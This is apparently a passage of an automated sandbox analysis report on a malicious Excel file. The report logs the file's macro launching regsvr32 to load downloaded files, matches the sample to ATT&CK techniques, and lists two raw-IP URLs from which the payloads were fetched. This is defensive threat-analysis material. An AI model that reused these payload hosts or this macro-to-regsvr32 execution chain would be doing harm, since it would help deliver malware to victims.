uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: classification engineClassification label: mal68.expl.evad.winXLSX@7/10@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{5B99ED4D-368E-46F3-B962-C6561ED05FE5} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\Post.storg2
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

    Data Obfuscation:

    barindex
    Yara detected Obfuscated Macro In XLSMShow sources
    Source: Yara matchFile source: intlsheet4.xml, type: SAMPLE
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    http://190.14.37.134/44356.4024921296.dat0%Avira URL Cloudsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    http://51.89.115.124/44356.4024921296.dat0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://190.14.37.134/44356.4024921296.datfalse
    • Avira URL Cloud: safe
    unknown
    http://51.89.115.124/44356.4024921296.datfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
      high
      https://login.microsoftonline.com/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
        high
        https://shell.suite.office.com:1443C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
            high
            https://autodiscover-s.outlook.com/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                high
                https://cdn.entity.C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/queryC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkeyC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                      high
                      https://powerlift.acompli.netC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                        high
                        https://cortana.aiC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspxC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                  high
                                  https://api.aadrm.com/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                        high
                                        https://cr.office.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControlC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/OfficeC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                              high
                                              https://graph.ppe.windows.netC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptioneventsC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.netC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplateC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplateC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetectC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.msC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groupsC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                              high
                                                              https://graph.windows.netC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/apiC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetectC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                        high
